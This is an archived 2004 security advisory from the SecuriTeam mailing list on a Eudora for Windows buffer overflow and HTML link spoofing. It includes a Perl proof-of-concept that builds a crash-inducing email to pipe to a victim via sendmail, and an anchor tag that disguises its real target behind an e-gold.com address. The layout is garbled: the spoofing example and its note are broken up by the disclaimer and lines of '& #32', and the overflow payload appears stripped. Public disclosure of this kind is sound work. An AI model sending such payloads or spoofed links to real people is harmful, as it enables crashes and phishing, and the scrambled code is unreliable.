[NT] Eudora File URL Buffer Overflow
From: SecuriTeam (support_at_securiteam.com)
Date: 05/09/04
- Previous message: SecuriTeam: "[NT] MyWeb Buffer Overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 9 May 2004 19:21:14 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Eudora File URL Buffer Overflow
------------------------------------------------------------------------
SUMMARY
<http://www.qualcomm.com/> Eudora "developed and distributed by QUALCOMM
Inc. is a Mail User Agent running on Windows 95/98/2000/ME/NT 4.0 and
MacOS 8.1 or later".
A buffer overflow vulnerability exists in Eudora for Windows. In addition,
it is possible to spoof URLs in HTTP links that to the user's dismay will
show the spoofed URL and not the actual URL pointed to.
DETAILS
Vulnerable Systems:
* Eudora for Windows versions 5.2.1, 6.0.3, 6.1
Buffer Overflow
While handling a crafted Email message with an HTTP link (A HREF tag), it
is possible to trigger a buffer overflow. The problem lies in the fact
that the handling of the A HREF tag contains a bug that allows the
contents of the buffer to overflow. Therefore, piping the output of the
following Perl script to a program such as Sendmail will send a crafted
message that will trigger the buffer overflow:
#!/usr/bin/perl --
print "From: me\n";
print "To: you\n";
print "Subject: Eudora file URL buffer overflow demo\n";
print "X-Use: Pipe the output of this script into: sendmail -i
victim\n\n";
print "The following is a \"proper\" HTML URL, pointing to somewhere
long:\n";
print "\n";
print " <C:\\> \n";
print "Fake URL to http://anywhere/I/want\n";
print "\n";
print "Clicking above will crash Eudora.\n\n";
print "The following plain-text converted by Eudora into a clickable
URL\n";
print "http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx\n";
print "is for comparison: the user can hardly tell them apart.\n\n";
URL Spoofing
It is possible to construct an A HREF tag that contains a link to another
page but when display will show a totally different address. An example:
<a href="http://www.e-gold.com
Note: The combination '&#' was replaced with '& #' in order to see the
ADDITIONAL INFORMATION
The information has been provided by <mailto:psz@maths.usyd.edu.au> paul
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
====================
DISCLAIMER:
& #32& #32& #32& #32& #32& #32& #32& #32& #32& #32
& #32& #32& #32& #32& #32& #32& #32& #32& #32& #32
& #32& #32& #32& #32& #32& #32& #32& #32& #32& #32
& #32& #32& #32& #32& #32& #32& #32& #32& #32& #32
& #32& #32& #32& #32& #32& #32& #32& #32& #32& #32
& #32& #32& #32& #32& #32& #32& #32& #32& #32& #32
& #32& #32& #32& #32& #32& #32& #32& #32& #32& #32
& #32& #32& #32& #32& #32& #32& #32& #32& #32& #32
& #32& #32& #32& #32& #32& #32& #32& #32& #32& #32
& #32& #32& #32& #32& #32& #32& #32& #32& #32& #32
& #32& #32& #32& #32& #32& #32& #32& #32& #32& #32
& #32& #32& #32& #32& #32& #32& #32& #32& #32& #32
& #32& #32& #32& #32& #32& #32& #32& #32& #32& #32
& #32& #32& #32& #32& #32& #32& #32& #32& #32& #32
& #32& #32& #32& #32& #32& #32& #32& #32& #32& #32
& #32& #32& #32& #32& #32& #32& #32& #32& #32& #32
@egegold.com/"><span lang=EN-US
style='mso-ansi-language:EN-US'>http://www.e-gold.com/alert></a><br>
link's source (otherwise it displays as spaces). When the mouse cursor
hovers above the link, the spoofed URL will be shown in the tooltip.
szabo.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
Relevant Pages
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Lhaplus LHA Extended Header Handling Buffer Overflow ... A vulnerability has been found in Lhaplus. ... This advisory discloses a buffer overflow vulnerability in Lhaplus. ...
(Securiteam)
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... $HOME environment variable demonstrates the buffer overflow, ... GNU gdb 5.0 ... vulnerability or to otherwise crash the program. ...
(Securiteam)
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... An exploitable buffer overflow in Microsoft Windows' DirectSpeechSynthesis ... arbitrary code by overflowing the ModeName parameter of the ActiveX. ... Microsoft Windows DirectSpeechSynthesis Module ...
(Securiteam)
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... CA ARCServe Backup for Laptops and Desktops Multiple Buffer Overflow ... Remote exploitation of multiple buffer overflow vulnerabilities in ... rxsGetSubDirs, rxsGetServerDBPathName, rxsSetServerOptions, rxsDeleteFile, ...
(Securiteam)
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... DynaZip DZIP32.DLL/DZIPS32.DLL Buffer Overflow Vulnerabilities ... This advisory discloses some buffer overflow vulnerabilities in DynaZip ... DWORD var1; ...
(Securiteam)
